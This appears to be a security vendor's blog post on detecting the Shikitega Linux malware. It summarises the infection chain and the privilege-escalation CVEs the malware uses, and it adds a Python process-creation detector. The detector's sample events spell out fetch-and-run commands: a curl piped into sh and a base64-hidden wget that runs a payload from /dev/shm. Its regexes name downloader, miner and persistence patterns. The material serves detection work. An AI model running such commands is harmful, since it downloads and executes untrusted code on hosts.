Shikitega Malware Detection: Executes Multistage Infection Chain, Grants Full Control

New Shikitega Malware

A new stealthy Linux malware named Shikitega is on the prowl for victims. Its operators run highly evasive attacks against Linux servers and IoT devices. Analysis of Shikitega shows a multi-stage infection chain in which small stages fetch further payloads from the attackers' infrastructure, aimed at taking full control of the compromised host: exploiting local vulnerabilities to gain root, establishing persistence, and dropping additional payloads, including a Monero miner.

This campaign fits the growing number of recent attacks on Linux systems, joining a rapidly expanding list of threats such as Syslogk, XorDdos, and BPFDoor.

Detect Shikitega Malware

To help security practitioners spot possible attacks involving this new Linux malware, Sittikorn Sangrattanapitak has released a rule that detects execution of the Shikitega script:

Possible Shikitega Stealthy Malware Targeting Linux System (via process creation)

This detection has translations for the following SIEM, EDR & XDR platforms: Microsoft Sentinel, Elastic Stack, Splunk, Humio, Sumo Logic, ArcSight, QRadar, FireEye, LogPoint, SentinelOne, Graylog, Regex Grep, CrowdStrike, Microsoft PowerShell, RSA NetWitness, Chronicle Security, Microsoft Defender ATP, Snowflake, Securonix, Apache Kafka ksqlDB, Carbon Black, Open Distro, and AWS OpenSearch.

The rule is aligned with the MITRE ATT&CK® framework v10, covering the Defense Evasion and Execution tactics with Obfuscated Files or Information (T1027) and System Services (T1569) as the primary techniques.

SOC Prime has revolutionized the way that security teams access threat detection content. We harness the power of collaborative cyber defense, working hard towards facilitating a cross-border “Cyber NATO” to effectively withstand emerging threats. Click the Explore Detections button below to instantly reach dedicated detections and dive into relevant cyber threat contexts without registration directly from the Cyber Threats Search Engine.

Explore Detections  

Shikitega Malware Analysis

Security researchers from AT&T Alien Labs documented the new strain in September 2022. The initial compromise vector used by the Shikitega operators is still unknown. Once on a system, the malware fetches further payloads from its command-and-control (C2) server and executes them in memory, leaving little on disk for file-based scanners to find. It also deploys Mettle, Metasploit's Meterpreter payload for Linux, which gives the operators remote control of the host for a wide range of follow-on actions. To lower its chances of detection by signature-based antivirus, Shikitega encodes its stages with a polymorphic encoder, so each encoded copy differs byte for byte while the decoded payload stays the same.

For cryptocurrency mining, Shikitega drops the legitimate open-source XMRig miner. To run it with root privileges and persist it on the host, the malware exploits two high-severity Linux local privilege escalation vulnerabilities, CVE-2021-4034 (PwnKit, in polkit's pkexec) and CVE-2021-3493 (an OverlayFS flaw in Ubuntu kernels); hosts patched for both deny the chain its escalation step even if the initial dropper lands.
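As an added example (not the SOC Prime rule above and not code from the AT&T Alien Labs report), the following Python sketches how a process-creation detector could score the behaviours this analysis describes: a downloader piped straight into a shell, a base64-encoded command decoded into a shell (T1027), payloads staged in memory-backed paths, miner arguments, and cron or systemd persistence (T1569) that is escalated only when it sits under a parent chain that already looked suspicious. The event schema, the indicator regexes, and the sample events (including the 192.0.2.10 address, taken from the documentation range) are assumptions made for the demonstration.

```python
# Added example: an illustrative detector, not the SOC Prime rule and not code
# from the AT&T Alien Labs report. The event schema, indicator regexes and the
# sample events below are assumptions made for the demonstration.
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    cmdline: str  # full command line as logged by the process-creation sensor

@dataclass
class Finding:
    pid: int
    rule: str
    severity: str  # "low" or "high"
    detail: str

# Assumed indicator patterns for the behaviours the analysis describes: a
# downloader piped into a shell, a base64 blob decoded into a shell (T1027),
# memory-backed staging paths, XMRig-style arguments, cron/systemd changes (T1569).
FETCH_TO_SHELL = re.compile(r"\b(?:curl|wget)\b[^|;&]*\|\s*(?:sh|bash)\b")
B64_TO_SHELL = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:sh|bash)\b")
B64_BLOB = re.compile(r"echo\s+(?:-n\s+)?([A-Za-z0-9+/=]{16,})\s*\|")
IN_MEMORY = re.compile(r"/dev/shm/|memfd:|/proc/self/fd/\d+")
MINER = re.compile(r"xmrig|stratum\+tcp://|--donate-level", re.IGNORECASE)
PERSISTENCE = re.compile(r"\bcrontab\s+-|\bsystemctl\s+(?:enable|start)\b|/etc/cron")

def decode_inline_base64(cmdline: str) -> Optional[str]:
    """Decode the blob of an `echo <b64> | base64 -d | sh` command, else None."""
    m = B64_BLOB.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None

def evaluate(event: ProcEvent) -> List[Finding]:
    """Stateless per-event checks. The decoded blob is searched as well, so an
    obfuscated downloader is caught although the raw command line hides it."""
    decoded = decode_inline_base64(event.cmdline)
    text = event.cmdline if decoded is None else event.cmdline + "\n" + decoded
    checks = [
        ("base64-to-shell", "high", B64_TO_SHELL.search(event.cmdline), f"decoded: {decoded!r}"),
        ("fetch-pipe-to-shell", "high", FETCH_TO_SHELL.search(text), "downloader piped into a shell"),
        ("memory-resident-path", "low", IN_MEMORY.search(text), "payload staged in /dev/shm or a memfd"),
        ("miner-indicator", "high", MINER.search(text), "XMRig-style miner arguments"),
        ("persistence", "low", PERSISTENCE.search(text), "cron or systemd change"),
    ]
    return [Finding(event.pid, rule, sev, detail) for rule, sev, hit, detail in checks if hit]

def _tainted_ancestor(event, by_pid, results, max_depth=8) -> bool:
    """True if an ancestor in the same batch already has a high-severity finding."""
    ppid = event.ppid
    for _ in range(max_depth):
        parent = by_pid.get(ppid)
        if parent is None:
            return False
        if any(f.severity == "high" for f in results.get(parent.pid, [])):
            return True
        ppid = parent.ppid
    return False

def scan(events: List[ProcEvent]) -> Dict[int, List[Finding]]:
    """Evaluate a batch, then raise persistence to high severity only when it sits
    under a chain that already matched a high rule; a lone admin `systemctl start`
    stays low, which keeps the T1569 check from paging on routine service restarts."""
    by_pid = {e.pid: e for e in events}
    results = {e.pid: evaluate(e) for e in events}
    for e in events:
        for f in results[e.pid]:
            if f.rule == "persistence" and _tainted_ancestor(e, by_pid, results):
                f.severity = "high"
                f.detail += " under an already-suspicious parent chain"
    return results

# Constructed sample events, not real telemetry (192.0.2.0/24 is a documentation range).
_STAGE2 = "wget -q -O /dev/shm/.x http://192.0.2.10/x && chmod +x /dev/shm/.x && /dev/shm/.x"
SAMPLE_EVENTS = [
    ProcEvent(101, 1, "sh -c 'curl -s http://192.0.2.10/a | sh'"),
    ProcEvent(102, 101, "sh -c 'echo %s | base64 -d | sh'"
              % base64.b64encode(_STAGE2.encode()).decode()),
    ProcEvent(103, 102, "crontab -"),
    ProcEvent(104, 1, "apt-get update"),
    ProcEvent(105, 1, "systemctl start nginx"),
]

if __name__ == "__main__":
    for pid, findings in scan(SAMPLE_EVENTS).items():
        for f in findings:
            print(f"pid={pid} [{f.severity}] {f.rule}: {f.detail}")
```

Running it prints one line per finding. The reason for decoding the inline base64 before matching is that the raw command line of the second-stage event contains no download verb at all; a rule that matches only the literal command line would miss the `wget` into `/dev/shm` that the blob hides. The parent-chain escalation is what separates the `crontab -` spawned by that chain from an administrator's `systemctl start nginx`. In production the indicator set would be tuned to the sensor's actual fields and allow-listed for known administrative activity.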

Join SOC Prime’s Detection as Code platform to unlock access to the world’s largest pool of detection content created by reputable experts in the field. Rest assured that you will not be missing out on any important updates since our SOC experts strive to publish all the latest detections, maintaining a swift response to the latest threats.
